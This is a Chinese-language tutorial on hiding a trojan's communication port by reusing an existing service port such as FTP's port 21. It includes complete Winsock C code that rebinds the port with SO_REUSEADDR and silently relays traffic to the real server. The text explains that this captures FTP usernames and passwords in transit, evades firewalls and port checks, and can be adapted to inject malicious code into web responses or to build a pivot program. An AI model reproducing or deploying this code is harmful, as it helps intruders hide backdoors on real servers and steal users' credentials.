木馬的服務端與客戶端通信必將產生活動端口,產生活動端口就很容易被發現,那么應該如何隱藏端口呢?
1. 端口復用的原理
端口復用就是某個已經被其他服務綁定過的端口再次被綁定而進行重復使用。端口復用對于木馬程序來說有兩個好處。第一個好處是隱藏端口,比如某臺主機上搭建了FTP服務器,這樣默認情況下就開啟了21號端口,通過端口復用就可以直接使用21號端口完成木馬的通信,在進行檢測時就不會發現有多余的端口被打開;第二個好處是不會被防火墻阻攔,因為端口復用FTP服務端口或Web服務端口這些已知和合法的端口,這些端口在服務器上是正常使用的端口,那么管理員當然會允許這些正常服務的通信連接。
木馬使用端口復用技術后,由于木馬和被復用服務使用同一個端口(比如木馬復用了FTP的21號端口),當數據包到達時,系統根據指定IP地址較詳細的原則就傳遞給誰。指定IP地址時的代碼如下:
sockaddr_in saddr;
saddr.sin_addr.S_un.S_addr = INADDR_ANY;
在代碼中對地址的賦值使用了INADDR_ANY,表示任意的本機IP地址都可以。這樣指定的地址不是最明確的。通常提供服務的Web服務器或FTP服務器都有類似的設置。那么在編寫使用端口復用技術的木馬時,就要明確指定用戶所使用的一個IP地址。無論用戶是擁有內網的IP地址,還是有外網的IP地址,都擁有一個回環地址,即127.0.0.1。在設置重復綁定的端口時,可以設置為除127.0.0.1之外的任意具體IP地址。比如,可以設定一個“10.10.30.77”IP地址。而127.0.0.1這個回環地址是木馬與提供服務的服務器軟件進行通信的。示意圖如圖1所示。
圖1 端口服務用木馬通信示意圖
從圖1中可以看出,無論是防火墻外部還是防火墻內容,木馬都是可以正常通信的。復用了FTP服務器端口的木馬會收到所有發給FTP服務器的數據,那么木馬在中間充當一個數據中轉的作用,把原本發給FTP服務器的數據還是轉發給FTP服務器。如何區分是發給FTP服務器的數據,還是發給木馬的數據?凡是發給木馬的數據都是有固定的數據頭部的,以此可以判斷哪些數據轉發、哪些數據自己進行處理。由于木馬所處的通信位置,很容易截取到發送給FTP服務器的數據,也很容易篡改FTP服務器發送給客戶端的數據。這點是很可怕、很危險的。同樣,如果復用的是Web服務器的端口,那么就可以在不修改Web頁面的情況下,直接發送給瀏覽器一些惡意代碼,從而對用戶進行攻擊。
2. 端口復用的代碼實現
下面來看源代碼的實現。
#include <stdio.h>
#include <winsock2.h>
#pragma comment (lib, “ws2_32”)
DWORD WINAPI ClientThread(LPVOID lpParam);
int main()
{
WSADATA wsa;
SOCKET s;
BOOL bVal;
SOCKET sc;
int nAddrSize;
sockaddr_in ClientAddr;
// 初始化 SOCK 庫
WSAStartup(MAKEWORD(2, 2), &wsa);
// 建立套接字
s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
bVal = TRUE;
// 設置套接字為復用模式
if ( setsockopt(s, SOL_SOCKET, SO_REUSEADDR, (char *)&bVal, sizeof(bVal)) != 0 )
{
printf(“error! \r\n”);
return -1;
}
sockaddr_in sListen;
sListen.sin_family = AF_INET;
// 這里的 IP 地址必須明確指定一個地址
sListen.sin_addr.S_un.S_addr = inet_addr(“192.168.1.102”);
sListen.sin_port = htons(21);
// 綁定 21 號端口
if ( bind(s, (SOCKADDR*)&sListen, sizeof(SOCKADDR)) == SOCKET_ERROR )
{
printf(“%d\r\n”, GetLastError());
printf(“error bind! \r\n”);
return -1;
}
// 監聽套接字
listen(s, 1);
// 循環接受來自 FTP 客戶端或木馬的請求
while ( TRUE )
{
HANDLE hThread;
nAddrSize = sizeof(SOCKADDR);
// 接受請求
sc = accept(s, (SOCKADDR*)&ClientAddr, &nAddrSize);
if ( sc != INVALID_SOCKET )
{
// 創建新線程進行處理
hThread = CreateThread(NULL, 0, ClientThread, (LPVOID)sc, 0, NULL);
CloseHandle(hThread);
}
}
closesocket(s);
WSACleanup();
return 0;
}
DWORD WINAPI ClientThread(LPVOID lpParam)
{
// 保存與 FTP 客戶端通信的 SOCKET
SOCKET sc = (SOCKET)lpParam;
// 建立與 FTP 服務器端通信的 SOCKET
SOCKET sFtp;
sockaddr_in saddr;
DWORD dwTimeOut;
DWORD dwNum;
BYTE bBuffer[0x1000] = { 0 };
sFtp = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
saddr.sin_family = AF_INET;
saddr.sin_addr.S_un.S_addr = inet_addr(“127.0.0.1”);
saddr.sin_port = htons(21);
// 設置超時
dwTimeOut = 100;
setsockopt(sc, SOL_SOCKET, SO_RCVTIMEO,
(char *)&dwTimeOut, sizeof(dwTimeOut));
setsockopt(sFtp, SOL_SOCKET, SO_RCVTIMEO,
?。╟har *)&dwTimeOut, sizeof(dwTimeOut));
// 連接 FTP 服務器
connect(sFtp, (SOCKADDR*)&saddr, sizeof(SOCKADDR));
// 循環接受客戶端與服務器的通信數據
while ( TRUE )
{
// 接收客戶端的數據
dwNum = recv(sc, (char *)bBuffer, 0x1000, 0);
if ( dwNum > 0 && dwNum != SOCKET_ERROR )
{
bBuffer[dwNum] = '\0';
printf(“%s \r\n”, bBuffer);
// 轉發給 FTP 服務器端
send(sFtp, (char *)bBuffer, dwNum, 0);
}
else if ( dwNum == 0 )
{
break;
}
ZeroMemory(bBuffer, 0x1000);
// 接收 FTP 服務器端的數據
dwNum = recv(sFtp, (char *)bBuffer, 0x1000, 0);
if ( dwNum > 0 && dwNum != SOCKET_ERROR )
{
bBuffer[dwNum] = '\0';
printf(“%s \r\n”, bBuffer);
// 轉發給客戶端
send(sc, (char *)bBuffer, dwNum, 0);
}
else if ( dwNum == 0 )
{
break;
}
ZeroMemory(bBuffer, 0x1000);
}
closesocket(sc);
closesocket(sFtp);
return 0;
}
這里的代碼中只是實現了一個端口復用的轉發功能,并沒有提供木馬的相應功能。如果加入木馬的功能,就要在木馬收到數據后先判斷是控制端發送的木馬命令,還是應該轉發的數據,從而進行相應的處理。木馬在轉發數據的過程中獲取了FTP數據,如圖2所示。
圖2 木馬轉發數據
編譯連接自己的代碼,然后先啟動FTP服務器,再啟動連接好的木馬,通過命令行下連接FTP服務器。在木馬轉發的過程中得到了登錄FTP服務器的賬號和密碼(FTP對于賬號和密碼的傳輸都是明文進行的)。以此來看,木馬在轉發數據包的過程中也成了針對某服務的嗅探工具。
如法炮制,通過簡單修改上面的代碼則可以改成一個跳板程序。具體實現方式與此類似,就不再進行闡述。作為延展性的內容,請大家自行完成。